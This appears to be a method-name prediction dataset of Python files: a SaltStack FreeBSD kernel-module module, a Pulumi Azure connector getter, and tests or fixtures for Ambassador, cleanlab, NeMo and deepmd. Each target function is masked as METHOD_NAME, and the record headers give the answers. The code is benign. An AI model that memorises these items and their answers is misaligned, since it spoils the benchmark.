            "The freebsdkmod execution module cannot be loaded: only available on FreeBSD"
            " systems.",
        )
    return __virtualname__
def _new_mods(pre_mods, post_mods):
"""
Return a list of the new modules, pass an kldstat dict before running
modprobe and one after modprobe has run
"""
pre = set()
post = set()
for mod in pre_mods:
pre.add(mod["module"])
for mod in post_mods:
post.add(mod["module"])
return post - pre
def _rm_mods(pre_mods, post_mods):
"""
Return a list of the new modules, pass an kldstat dict before running
modprobe and one after modprobe has run
"""
pre = set()
post = set()
for mod in pre_mods:
pre.add(mod["module"])
for mod in post_mods:
post.add(mod["module"])
return pre - post
def _get_module_name(line):
    """Return the module name from a loader.conf persistence line, else ``None``."""
    found = re.search(_MODULES_RE, line)
    return found.group(1) if found else None
def _get_persistent_modules():
    """
    Return the set of module names configured in loader.conf to load on boot.
    """
    # NOTE(review): salt.utils.stringutils is used below but only
    # salt.utils.files appears in this module's imports — confirm
    # `import salt.utils.stringutils` exists at the top of the file,
    # otherwise this raises AttributeError at runtime.
    mods = set()
    with salt.utils.files.fopen(_LOADER_CONF, "r") as loader_conf:
        for line in loader_conf:
            line = salt.utils.stringutils.to_unicode(line)
            line = line.strip()
            mod_name = _get_module_name(line)
            if mod_name:
                mods.add(mod_name)
    return mods
def _set_persistent_module(mod):
    """
    Add a module to loader.conf to make it persistent.

    Returns the set of module names added (empty if nothing was done).
    """
    if not mod:
        return set()
    if mod in mod_list(True):
        # Already configured to load at boot.
        return set()
    if mod not in METHOD_NAME():
        # Unknown module: refuse to persist it.
        return set()
    __salt__["file.append"](_LOADER_CONF, _LOAD_MODULE.format(mod))
    return {mod}
def _remove_persistent_module(mod, comment):
    """
    Remove a module's persistence entry from loader.conf.

    If ``comment`` is true, only comment out the line instead of deleting it.
    Returns the set of module names removed (empty if nothing was done).
    """
    if not mod:
        return set()
    if mod not in mod_list(True):
        return set()
    pattern = _MODULE_RE.format(mod)
    if comment:
        __salt__["file.comment"](_LOADER_CONF, pattern)
    else:
        __salt__["file.sed"](_LOADER_CONF, pattern, "")
    return {mod}
def METHOD_NAME():
    """
    Return a list of all available kernel modules

    CLI Example:

    .. code-block:: bash

        salt '*' kmod.available
    """
    modules = []
    for path in __salt__["file.find"]("/boot/kernel", name="*.ko$"):
        parts = os.path.basename(path).split(".")
        if "ko" not in parts:
            continue
        # Strip the .ko extension (and anything after it) from the filename.
        modules.append(".".join(parts[: parts.index("ko")]))
    return modules
def check_available(mod):
    """
    Check to see if the specified kernel module is available

    CLI Example:

    .. code-block:: bash

        salt '*' kmod.check_available vmm
    """
    available_mods = METHOD_NAME()
    return mod in available_mods
def lsmod():
    """
    Return a dict containing information about currently loaded modules

    CLI Example:

    .. code-block:: bash

        salt '*' kmod.lsmod
    """
    ret = []
    for line in __salt__["cmd.run"]("kldstat").splitlines():
        comps = line.split()
        # ROBUSTNESS FIX: comps[4] is read below, so require at least five
        # columns; the original `len(comps) > 2` guard allowed an IndexError
        # on malformed 3- or 4-column lines.
        if len(comps) < 5:
            continue
        if comps[0] == "Id":
            # Header line: "Id Refs Address Size Name".
            continue
        if comps[4] == "kernel":
            continue
        # Name column carries a ".ko" suffix which is stripped here.
        ret.append({"module": comps[4][:-3], "size": comps[3], "depcount": comps[1]})
    return ret
def mod_list(only_persist=False):
    """
    Return a sorted list of the loaded module names

    only_persist
        If True, return only the modules configured in /boot/loader.conf
        to load at boot.

    CLI Example:

    .. code-block:: bash

        salt '*' kmod.mod_list
    """
    if only_persist:
        # CONSISTENCY FIX: the original returned a bare set() when no
        # persistent modules were configured but a sorted list otherwise;
        # always return a sorted list. This also avoids calling
        # _get_persistent_modules() twice.
        mods = set(_get_persistent_modules())
    else:
        mods = {mod["module"] for mod in lsmod()}
    return sorted(mods)
def load(mod, persist=False):
    """
    Load the specified kernel module

    mod
        Name of the module to add

    persist
        Write the module to sysrc kld_modules to make it load on system reboot

    CLI Example:

    .. code-block:: bash

        salt '*' kmod.load bhyve
    """
    # Snapshot the loaded modules so the diff after kldload tells us exactly
    # what this call brought in.
    pre_mods = lsmod()
    response = __salt__["cmd.run_all"]("kldload {}".format(mod), python_shell=False)
    if response["retcode"] == 0:
        post_mods = lsmod()
        mods = _new_mods(pre_mods, post_mods)
        persist_mods = set()
        if persist:
            persist_mods = _set_persistent_module(mod)
        # Success path: sorted list of newly loaded and/or persisted names.
        return sorted(list(mods | persist_mods))
    elif "module already loaded or in kernel" in response["stderr"]:
        if persist and mod not in _get_persistent_modules():
            # Already loaded, but still record it for boot persistence.
            persist_mods = _set_persistent_module(mod)
            return sorted(list(persist_mods))
        else:
            # It's compiled into the kernel
            return [None]
    else:
        # NOTE: failure path returns an error *string*, while the success
        # paths return lists — callers must handle both shapes.
        return "Module {} not found".format(mod)
def is_loaded(mod):
    """
    Check to see if the specified kernel module is loaded

    CLI Example:

    .. code-block:: bash

        salt '*' kmod.is_loaded vmm
    """
    loaded_mods = mod_list()
    return mod in loaded_mods
def remove(mod, persist=False, comment=True):
    """
    Remove the specified kernel module

    mod
        Name of module to remove

    persist
        Also remove module from /boot/loader.conf

    comment
        If persist is set don't remove line from /boot/loader.conf but only
        comment it

    CLI Example:

    .. code-block:: bash

        salt '*' kmod.remove vmm
    """
    # Snapshot loaded modules so the post-unload diff reports exactly what
    # disappeared.
    pre_mods = lsmod()
    res = __salt__["cmd.run_all"]("kldunload {}".format(mod), python_shell=False)
    if res["retcode"] == 0:
        post_mods = lsmod()
        mods = _rm_mods(pre_mods, post_mods)
        persist_mods = set()
        if persist:
            persist_mods = _remove_persistent_module(mod, comment)
        # Success path: sorted list of unloaded and/or unpersisted names.
        return sorted(list(mods | persist_mods))
    else:
        # NOTE: failure path returns an error string, not a list.
        return "Error removing module {}: {}".format(mod, res["stderr"])
298,437 | get aws cloud trail data connector output | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetAwsCloudTrailDataConnectorResult',
'AwaitableGetAwsCloudTrailDataConnectorResult',
'get_aws_cloud_trail_data_connector',
'get_aws_cloud_trail_data_connector_output',
]
@pulumi.output_type
class GetAwsCloudTrailDataConnectorResult:
    """
    Represents Amazon Web Services CloudTrail data connector.
    """
    # Generated code (pulumi): each constructor argument is type-checked and
    # stored via pulumi.set so @pulumi.output_type can expose it as a getter.
    def __init__(__self__, aws_role_arn=None, data_types=None, etag=None, id=None, kind=None, name=None, system_data=None, type=None):
        if aws_role_arn and not isinstance(aws_role_arn, str):
            raise TypeError("Expected argument 'aws_role_arn' to be a str")
        pulumi.set(__self__, "aws_role_arn", aws_role_arn)
        if data_types and not isinstance(data_types, dict):
            raise TypeError("Expected argument 'data_types' to be a dict")
        pulumi.set(__self__, "data_types", data_types)
        if etag and not isinstance(etag, str):
            raise TypeError("Expected argument 'etag' to be a str")
        pulumi.set(__self__, "etag", etag)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if kind and not isinstance(kind, str):
            raise TypeError("Expected argument 'kind' to be a str")
        pulumi.set(__self__, "kind", kind)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if system_data and not isinstance(system_data, dict):
            raise TypeError("Expected argument 'system_data' to be a dict")
        pulumi.set(__self__, "system_data", system_data)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter(name="awsRoleArn")
    def aws_role_arn(self) -> Optional[str]:
        """
        The Aws Role Arn (with CloudTrailReadOnly policy) that is used to access the Aws account.
        """
        return pulumi.get(self, "aws_role_arn")

    @property
    @pulumi.getter(name="dataTypes")
    def data_types(self) -> 'outputs.AwsCloudTrailDataConnectorDataTypesResponse':
        """
        The available data types for the connector.
        """
        return pulumi.get(self, "data_types")

    @property
    @pulumi.getter
    def etag(self) -> Optional[str]:
        """
        Etag of the azure resource
        """
        return pulumi.get(self, "etag")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def kind(self) -> str:
        """
        The kind of the data connector
        Expected value is 'AmazonWebServicesCloudTrail'.
        """
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        The name of the resource
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="systemData")
    def system_data(self) -> 'outputs.SystemDataResponse':
        """
        Azure Resource Manager metadata containing createdBy and modifiedBy information.
        """
        return pulumi.get(self, "system_data")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
        """
        return pulumi.get(self, "type")
class AwaitableGetAwsCloudTrailDataConnectorResult(GetAwsCloudTrailDataConnectorResult):
    """Awaitable shim so the invoke result can be used with ``await``."""
    # pylint: disable=using-constant-test
    def __await__(self):
        # Generated pattern: the unreachable `yield` makes this a generator
        # (as __await__ must return one); it immediately returns a copy of
        # the result, field by field.
        if False:
            yield self
        return GetAwsCloudTrailDataConnectorResult(
            aws_role_arn=self.aws_role_arn,
            data_types=self.data_types,
            etag=self.etag,
            id=self.id,
            kind=self.kind,
            name=self.name,
            system_data=self.system_data,
            type=self.type)
def get_aws_cloud_trail_data_connector(data_connector_id: Optional[str] = None,
                                       resource_group_name: Optional[str] = None,
                                       workspace_name: Optional[str] = None,
                                       opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetAwsCloudTrailDataConnectorResult:
    """
    Gets a data connector.


    :param str data_connector_id: Connector ID
    :param str resource_group_name: The name of the resource group. The name is case insensitive.
    :param str workspace_name: The name of the workspace.
    """
    __args__ = dict()
    __args__['dataConnectorId'] = data_connector_id
    __args__['resourceGroupName'] = resource_group_name
    __args__['workspaceName'] = workspace_name
    opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
    # Invoke the provider function, then map the raw result onto the typed
    # awaitable wrapper field by field.
    __ret__ = pulumi.runtime.invoke('azure-native:securityinsights/v20230601preview:getAwsCloudTrailDataConnector', __args__, opts=opts, typ=GetAwsCloudTrailDataConnectorResult).value

    return AwaitableGetAwsCloudTrailDataConnectorResult(
        aws_role_arn=pulumi.get(__ret__, 'aws_role_arn'),
        data_types=pulumi.get(__ret__, 'data_types'),
        etag=pulumi.get(__ret__, 'etag'),
        id=pulumi.get(__ret__, 'id'),
        kind=pulumi.get(__ret__, 'kind'),
        name=pulumi.get(__ret__, 'name'),
        system_data=pulumi.get(__ret__, 'system_data'),
        type=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_aws_cloud_trail_data_connector)
def METHOD_NAME(data_connector_id: Optional[pulumi.Input[str]] = None,
                resource_group_name: Optional[pulumi.Input[str]] = None,
                workspace_name: Optional[pulumi.Input[str]] = None,
                opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetAwsCloudTrailDataConnectorResult]:
    """
    Gets a data connector.


    :param str data_connector_id: Connector ID
    :param str resource_group_name: The name of the resource group. The name is case insensitive.
    :param str workspace_name: The name of the workspace.
    """
    # Body intentionally empty: @_utilities.lift_output_func wraps the plain
    # invoke above and supplies the implementation for Output-typed inputs.
    ...
298,438 | test tracing cluster fields | import logging
from pathlib import Path
from typing import TYPE_CHECKING, Optional
import pytest
from tests.selfsigned import TLSCerts
from tests.utils import (
assert_valid_envoy_config,
econf_foreach_cluster,
module_and_mapping_manifests,
)
# Configure root logging once for this test module.
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s test %(levelname)s: %(message)s",
    datefmt="%Y-%m-%d %H:%M:%S",
)
logger = logging.getLogger("ambassador")
from ambassador import IR, Config, EnvoyConfig
from ambassador.fetch import ResourceFetcher
from ambassador.utils import NullSecretHandler, SecretHandler, SecretInfo
from tests.utils import default_listener_manifests
if TYPE_CHECKING:
from ambassador.ir.irresource import IRResource # pragma: no cover
class MockSecretHandler(SecretHandler):
    """Secret handler that always serves the canned 'acook' test certificate."""

    def load_secret(
        self, resource: "IRResource", secret_name: str, namespace: str
    ) -> Optional[SecretInfo]:
        # The requested secret is ignored entirely; every lookup resolves to
        # the fixed self-signed fallback cert, so tests never touch real k8s.
        return SecretInfo(
            "fallback-self-signed-cert",
            "ambassador",
            "mocked-fallback-secret",
            TLSCerts["acook"].pubcert,
            TLSCerts["acook"].privkey,
            decode_b64=False,
        )
def _get_envoy_config(yaml):
    """Compile the given k8s YAML (plus default listeners) into an EnvoyConfig."""
    aconf = Config()
    fetcher = ResourceFetcher(logger, aconf)
    fetcher.parse_yaml(default_listener_manifests() + yaml, k8s=True)
    aconf.load_all(fetcher.sorted())
    # Secrets are irrelevant here, so a null handler suffices.
    secret_handler = NullSecretHandler(logger, None, None, "0")
    ir = IR(aconf, file_checker=lambda path: True, secret_handler=secret_handler)
    assert ir
    return EnvoyConfig.generate(ir)
@pytest.mark.compilertest
def test_tracing_config_v3(tmp_path: Path):
    """A v3alpha1 zipkin TracingService must emit custom_tags on the HTTP filter
    and a zipkin tracer in the bootstrap config."""
    aconf = Config()
    yaml = (
        module_and_mapping_manifests(None, [])
        + "\n"
        + """
---
apiVersion: getambassador.io/v3alpha1
kind: TracingService
metadata:
  name: myts
  namespace: default
spec:
  service: zipkin-test:9411
  driver: zipkin
  custom_tags:
  - tag: ltag
    literal:
      value: avalue
  - tag: etag
    environment:
      name: UNKNOWN_ENV_VAR
      default_value: efallback
  - tag: htag
    request_header:
      name: x-does-not-exist
      default_value: hfallback
"""
    )
    fetcher = ResourceFetcher(logger, aconf)
    fetcher.parse_yaml(yaml, k8s=True)
    aconf.load_all(fetcher.sorted())
    secret_handler = MockSecretHandler(
        logger, "mockery", str(tmp_path / "ambassador" / "snapshots"), "v1"
    )
    ir = IR(aconf, file_checker=lambda path: True, secret_handler=secret_handler)
    assert ir
    econf = EnvoyConfig.generate(ir)
    # check if custom_tags are added
    assert econf.as_dict()["static_resources"]["listeners"][0]["filter_chains"][0]["filters"][0][
        "typed_config"
    ]["tracing"] == {
        "custom_tags": [
            {"literal": {"value": "avalue"}, "tag": "ltag"},
            {
                "environment": {"default_value": "efallback", "name": "UNKNOWN_ENV_VAR"},
                "tag": "etag",
            },
            {
                "request_header": {"default_value": "hfallback", "name": "x-does-not-exist"},
                "tag": "htag",
            },
        ]
    }
    bootstrap_config, ads_config, _ = econf.split_config()
    # The tracer itself lives in the bootstrap config, keyed by the
    # generated collector-cluster name.
    assert "tracing" in bootstrap_config
    assert bootstrap_config["tracing"] == {
        "http": {
            "name": "envoy.zipkin",
            "typed_config": {
                "@type": "type.googleapis.com/envoy.config.trace.v3.ZipkinConfig",
                "collector_endpoint": "/api/v2/spans",
                "collector_endpoint_version": "HTTP_JSON",
                "trace_id_128bit": True,
                "collector_cluster": "cluster_tracing_zipkin_test_9411_default",
            },
        }
    }
    ads_config.pop("@type", None)
    # Both halves of the split config must validate against Envoy's schema.
    assert_valid_envoy_config(ads_config, extra_dirs=[str(tmp_path / "ambassador" / "snapshots")])
    assert_valid_envoy_config(
        bootstrap_config, extra_dirs=[str(tmp_path / "ambassador" / "snapshots")]
    )
@pytest.mark.compilertest
def test_tracing_zipkin_defaults():
    """A zipkin TracingService with no config must receive the documented defaults."""
    yaml = """
---
apiVersion: getambassador.io/v3alpha1
kind: TracingService
metadata:
  name: myts
  namespace: default
spec:
  service: zipkin-test:9411
  driver: zipkin
"""
    econf = _get_envoy_config(yaml)

    bootstrap_config, _, _ = econf.split_config()
    assert "tracing" in bootstrap_config
    # Default endpoint, endpoint version and 128-bit trace ids are filled in.
    assert bootstrap_config["tracing"] == {
        "http": {
            "name": "envoy.zipkin",
            "typed_config": {
                "@type": "type.googleapis.com/envoy.config.trace.v3.ZipkinConfig",
                "collector_endpoint": "/api/v2/spans",
                "collector_endpoint_version": "HTTP_JSON",
                "trace_id_128bit": True,
                "collector_cluster": "cluster_tracing_zipkin_test_9411_default",
            },
        }
    }
@pytest.mark.compilertest
def METHOD_NAME():
    """A TracingService stats_name must surface as alt_stat_name on the tracing cluster."""
    yaml = """
---
apiVersion: getambassador.io/v3alpha1
kind: TracingService
metadata:
  name: myts
  namespace: default
spec:
  service: zipkin-test:9411
  driver: zipkin
  stats_name: tracingservice
"""
    econf = _get_envoy_config(yaml)

    bootstrap_config, _, _ = econf.split_config()
    assert "tracing" in bootstrap_config
    cluster_name = "cluster_tracing_zipkin_test_9411_default"
    assert bootstrap_config["tracing"] == {
        "http": {
            "name": "envoy.zipkin",
            "typed_config": {
                "@type": "type.googleapis.com/envoy.config.trace.v3.ZipkinConfig",
                "collector_endpoint": "/api/v2/spans",
                "collector_endpoint_version": "HTTP_JSON",
                "trace_id_128bit": True,
                "collector_cluster": cluster_name,
            },
        }
    }

    # Verify the generated collector cluster carries the custom stats name.
    def check_fields(cluster):
        assert cluster["alt_stat_name"] == "tracingservice"

    econf_foreach_cluster(econf.as_dict(), check_fields, name=cluster_name)
@pytest.mark.compilertest
def test_tracing_zipkin_invalid_collector_version():
    """test to ensure that providing an improper value will result in an error and the tracer not included"""
    yaml = """
---
apiVersion: getambassador.io/v3alpha1
kind: TracingService
metadata:
  name: myts
  namespace: default
spec:
  service: zipkin-test:9411
  driver: zipkin
  config:
    collector_endpoint_version: "HTTP_JSON_V1"
"""
    econf = _get_envoy_config(yaml)

    bootstrap_config, _, _ = econf.split_config()
    # The invalid endpoint version is rejected, so no tracer reaches bootstrap.
    assert "tracing" not in bootstrap_config
@pytest.mark.compilertest
def test_lightstep_not_supported(tmp_path: Path):
    """The removed lightstep driver must produce a config error and no tracer."""
    # NOTE(review): tmp_path appears unused here — presumably kept for
    # signature parity with the other tests; confirm before removing.
    yaml = """
---
apiVersion: getambassador.io/v3alpha1
kind: TracingService
metadata:
  name: tracing
  namespace: ambassador
spec:
  service: lightstep:80
  driver: lightstep
  custom_tags:
  - tag: ltag
    literal:
      value: avalue
  - tag: etag
    environment:
      name: UNKNOWN_ENV_VAR
      default_value: efallback
  - tag: htag
    request_header:
      name: x-does-not-exist
      default_value: hfallback
  config:
    access_token_file: /lightstep-credentials/access-token
    propagation_modes: ["ENVOY", "TRACE_CONTEXT"]
"""
    econf = _get_envoy_config(yaml)
    # The driver is rejected with an explicit error on the aconf...
    assert "ir.tracing" in econf.ir.aconf.errors
    tracing_error = econf.ir.aconf.errors["ir.tracing"][0]["error"]
    assert "'lightstep' driver is no longer supported" in tracing_error

    bootstrap_config, _, _ = econf.split_config()
    # ...and no tracer makes it into the bootstrap config.
    assert "tracing" not in bootstrap_config
298,439 | pred probs | import numpy as np
import pandas as pd
import pytest
from datasets import load_dataset
from datasets.arrow_dataset import Dataset
from PIL import Image
from sklearn.neighbors import NearestNeighbors
from cleanlab.datalab.datalab import Datalab
# Fixed RNG seed for reproducible fixtures.
SEED = 42
# Column of the fixture dataset used as the label.
LABEL_NAME = "star"
@pytest.fixture
def dataset():
    """Small five-row app-review dataset with a 'star' label column."""
    data_dict = {
        "id": [
            "7bd227d9-afc9-11e6-aba1-c4b301cdf627",
            "7bd22905-afc9-11e6-a5dc-c4b301cdf627",
            "7bd2299c-afc9-11e6-85d6-c4b301cdf627",
            "7bd22a26-afc9-11e6-9309-c4b301cdf627",
            "7bd22aba-afc9-11e6-8293-c4b301cdf627",
        ],
        "package_name": [
            "com.mantz_it.rfanalyzer",
            "com.mantz_it.rfanalyzer",
            "com.mantz_it.rfanalyzer",
            "com.mantz_it.rfanalyzer",
            "com.mantz_it.rfanalyzer",
        ],
        "review": [
            "Great app! The new version now works on my Bravia Android TV which is great as it's right by my rooftop aerial cable. The scan feature would be useful...any ETA on when this will be available? Also the option to import a list of bookmarks e.g. from a simple properties file would be useful.",
            "Great It's not fully optimised and has some issues with crashing but still a nice app especially considering the price and it's open source.",
            "Works on a Nexus 6p I'm still messing around with my hackrf but it works with my Nexus 6p Trond usb-c to usb host adapter. Thanks!",
            "The bandwidth seemed to be limited to maximum 2 MHz or so. I tried to increase the bandwidth but not possible. I purchased this is because one of the pictures in the advertisement showed the 2.4GHz band with around 10MHz or more bandwidth. Is it not possible to increase the bandwidth? If not it is just the same performance as other free APPs.",
            "Works well with my Hackrf Hopefully new updates will arrive for extra functions",
        ],
        "date": [
            "October 12 2016",
            "August 23 2016",
            "August 04 2016",
            "July 25 2016",
            "July 22 2016",
        ],
        "star": [4, 4, 5, 3, 5],
        "version_id": [1487, 1487, 1487, 1487, 1487],
    }
    return Dataset.from_dict(data_dict)
@pytest.fixture
def label_name():
    """Name of the label column used by the Datalab fixtures."""
    return LABEL_NAME
@pytest.fixture
def lab(dataset, label_name):
    """Datalab wrapping the small text dataset."""
    return Datalab(data=dataset, label_name=label_name)
@pytest.fixture
def large_lab():
    """Datalab over 100 random 2-d points with labels, pred_probs and a cached knn graph."""
    np.random.seed(SEED)
    N = 100
    K = 2
    data = np.random.rand(N, 2)
    labels = np.random.randint(0, K, size=N)
    METHOD_NAME = np.random.rand(N, K)
    # Normalize rows so they form valid probability distributions.
    METHOD_NAME /= METHOD_NAME.sum(axis=1, keepdims=True)
    lab = Datalab(
        data={"features": data, "label": labels, "pred_probs": METHOD_NAME}, label_name="label"
    )
    knn = NearestNeighbors(n_neighbors=25, metric="euclidean").fit(data)
    knn_graph = knn.kneighbors_graph(mode="distance")
    # Stash the graph where tests expect to find a precomputed knn graph.
    lab.info["statistics"]["unit_test_knn_graph"] = knn_graph
    return lab
@pytest.fixture
def METHOD_NAME(dataset):
    """Random (n_examples, 3) predicted-probability matrix (rows not normalized)."""
    np.random.seed(SEED)
    return np.random.rand(len(dataset), 3)
@pytest.fixture
def custom_issue_manager():
    """Return a user-defined IssueManager subclass for plugin-registration tests."""
    from cleanlab.datalab.internal.issue_manager.issue_manager import IssueManager

    class CustomIssueManager(IssueManager):
        issue_name = "custom_issue"

        def find_issues(self, custom_argument: int = 1, **_) -> None:
            # Flag example as an issue if the custom argument equals its index
            scores = [
                abs(i - custom_argument) / (i + custom_argument)
                for i in range(len(self.datalab.data))
            ]
            self.issues = pd.DataFrame(
                {
                    f"is_{self.issue_name}_issue": [
                        i == custom_argument for i in range(len(self.datalab.data))
                    ],
                    self.issue_score_key: scores,
                },
            )
            summary_score = np.mean(scores)
            self.summary = self.make_summary(score=summary_score)

    return CustomIssueManager
def generate_image():
    """Return a random 300x300 RGB PIL image."""
    pixels = np.random.randint(low=0, high=256, size=(300, 300, 3), dtype=np.uint8)
    return Image.fromarray(pixels, mode="RGB")
@pytest.fixture
def image_dataset():
    """Load the small on-disk imagefolder dataset used by image tests."""
    data_path = "./tests/datalab/data"
    dataset = load_dataset(
        "imagefolder",
        data_dir=data_path,
        split="train",
    )
    return dataset
298,440 | test tabular tokenizer | # Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import string
import numpy as np
import pytest
from nemo.collections.common.tokenizers.column_coder import ColumnCodes
from nemo.collections.common.tokenizers.tabular_tokenizer import TabularTokenizer
class TestTabularTokenizer:
    """Round-trip tests for TabularTokenizer over coded tabular columns."""

    def setup_method(self, test_method):
        # Two float columns (different bases/transforms), one int column and
        # one categorical column, fitted on random example data.
        column_configs = [
            {
                "name": "col_a",
                "code_type": "float",
                "args": {"code_len": 4, "base": 16, "fillall": False, "hasnan": True, "transform": 'yeo-johnson'},
            },
            {
                "name": "col_b",
                "code_type": "float",
                "args": {"code_len": 4, "base": 177, "fillall": True, "hasnan": True, "transform": 'quantile'},
            },
            {
                "name": "col_c",
                "code_type": "int",
                "args": {"code_len": 3, "base": 12, "fillall": True, "hasnan": True},
            },
            {"name": "col_d", "code_type": "category",},
        ]
        example_arrays = {}
        np.random.seed(1234)
        array = np.random.random(100)
        example_arrays['col_a'] = array
        array = np.random.random(100)
        example_arrays['col_b'] = array
        array = np.random.randint(3, 1000, 100)
        example_arrays['col_c'] = array
        ALPHABET = np.array(list(string.ascii_lowercase + ' '))
        # Two-character random strings for the categorical column.
        array = np.char.add(np.random.choice(ALPHABET, 1000), np.random.choice(ALPHABET, 1000))
        example_arrays['col_d'] = array
        self.cc = ColumnCodes.get_column_codes(column_configs, example_arrays)

    @pytest.mark.unit
    def METHOD_NAME(self):
        tab = TabularTokenizer(self.cc, delimiter=',')
        # Full rows: two complete records, second terminated by end-of-doc.
        text = "0.323, 0.1, 232, xy\n0.323, 0.1, 232, xy<|endoftext|>"
        r = tab.text_to_tokens(text)
        assert len(r) == 10
        # Special ids sit just past the column vocabulary.
        assert tab.eod == 1351
        assert tab.eor == 1352
        assert tab.num_columns == 4
        assert self.cc.vocab_size == 1351
        assert tab.vocab_size == 1353
        r = tab.text_to_ids(text)
        # Each row encodes to sum(code sizes) value ids + one eor/eod id.
        assert (sum(self.cc.sizes) + 1) * 2 == len(r)
        assert np.array_equal(
            np.array(r[0:13]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1352])
        )
        assert np.array_equal(
            np.array(r[13:]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1351])
        )
        reversed_text = tab.ids_to_text(r)
        assert reversed_text == '0.3230,0.0999998,232,xy\n0.3230,0.0999998,232,xy<|endoftext|>'
        # Partial first row: only the last column present before the newline.
        text = "xy\n0.323, 0.1, 232, xy<|endoftext|>"
        r = tab.text_to_tokens(text)
        assert len(r) == 7
        r = tab.text_to_ids(text)
        assert sum(self.cc.sizes) + 1 + 2 == len(r)
        assert np.array_equal(np.array(r[0:2]), np.array([1313, 1352]))
        assert np.array_equal(
            np.array(r[2:15]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1351])
        )
        reversed_text = tab.ids_to_text(r)
        assert reversed_text == 'xy\n0.3230,0.0999998,232,xy<|endoftext|>'
        # Leading newline only: a single full row follows.
        text = "\n0.323, 0.1, 232, xy<|endoftext|>"
        r = tab.text_to_tokens(text)
        assert len(r) == 5
        r = tab.text_to_ids(text)
        assert sum(self.cc.sizes) + 1 == len(r)
        assert np.array_equal(
            np.array(r[0:13]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1351])
        )
        reversed_text = tab.ids_to_text(r)
        assert reversed_text == '0.3230,0.0999998,232,xy<|endoftext|>'
        # Partial first row: last two columns present before the newline.
        text = "232, xy\n0.323, 0.1, 232, xy<|endoftext|>"
        r = tab.text_to_tokens(text)
        assert len(r) == 8
        r = tab.text_to_ids(text)
        assert sum(self.cc.sizes) + 1 + 5 == len(r)
        assert np.array_equal(np.array(r[0:5]), np.array([787, 780, 773, 1313, 1352]))
        assert np.array_equal(
            np.array(r[5:18]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1351])
        )
        reversed_text = tab.ids_to_text(r)
        assert reversed_text == '232,xy\n0.3230,0.0999998,232,xy<|endoftext|>'
        # Partial first row: last three columns present before the newline.
        text = "0.1, 232, xy\n0.323, 0.1, 232, xy<|endoftext|>"
        r = tab.text_to_tokens(text)
        assert len(r) == 9
        r = tab.text_to_ids(text)
        assert sum(self.cc.sizes) + 1 + 9 == len(r)
        assert np.array_equal(np.array(r[0:9]), np.array([584, 417, 305, 76, 787, 780, 773, 1313, 1352]))
        assert np.array_equal(
            np.array(r[9:22]), np.array([49, 32, 29, 15, 584, 417, 305, 76, 787, 780, 773, 1313, 1351])
        )
        reversed_text = tab.ids_to_text(r)
        assert reversed_text == '0.0999998,232,xy\n0.3230,0.0999998,232,xy<|endoftext|>'
298,441 | subprocess run | # SPDX-License-Identifier: LGPL-3.0-or-later
import json
import os
import subprocess as sp
import unittest
import numpy as np
# from deepmd.entrypoints.compress import compress
from common import (
j_loader,
run_dp,
tests_path,
)
from deepmd.env import (
GLOBAL_NP_FLOAT_PRECISION,
)
from deepmd.infer import (
DeepPot,
)
# Loosen the comparison tolerance when the global precision is single precision.
if GLOBAL_NP_FLOAT_PRECISION == np.float32:
    default_places = 4
else:
    default_places = 10
def _file_delete(file):
if os.path.isdir(file):
os.rmdir(file)
elif os.path.isfile(file):
os.remove(file)
def METHOD_NAME(command):
    """Run *command* (split on whitespace, no shell), echo its combined
    stdout/stderr line by line, and return the process exit code.
    """
    # FIX: use Popen as a context manager so the stdout pipe is always
    # closed (the original leaked the pipe file descriptor).
    with sp.Popen(command.split(), shell=False, stdout=sp.PIPE, stderr=sp.STDOUT) as popen:
        for line in iter(popen.stdout.readline, b""):
            if hasattr(line, "decode"):
                line = line.decode("utf-8")
            print(line.rstrip())
        popen.wait()
        return popen.returncode
def _init_models():
    """Train, freeze and compress a small model once.

    Returns ``(input_json_path, frozen_model_path, compressed_model_path)``.
    Each dp step is asserted to exit with code 0.
    """
    data_file = str(tests_path / os.path.join("model_compression", "data"))
    frozen_model = str(tests_path / "dp-original-type-one-side-exclude-types.pb")
    compressed_model = str(tests_path / "dp-compressed-type-one-side-exclude-types.pb")
    INPUT = str(tests_path / "input.json")
    jdata = j_loader(str(tests_path / os.path.join("model_compression", "input.json")))
    jdata["training"]["training_data"]["systems"] = data_file
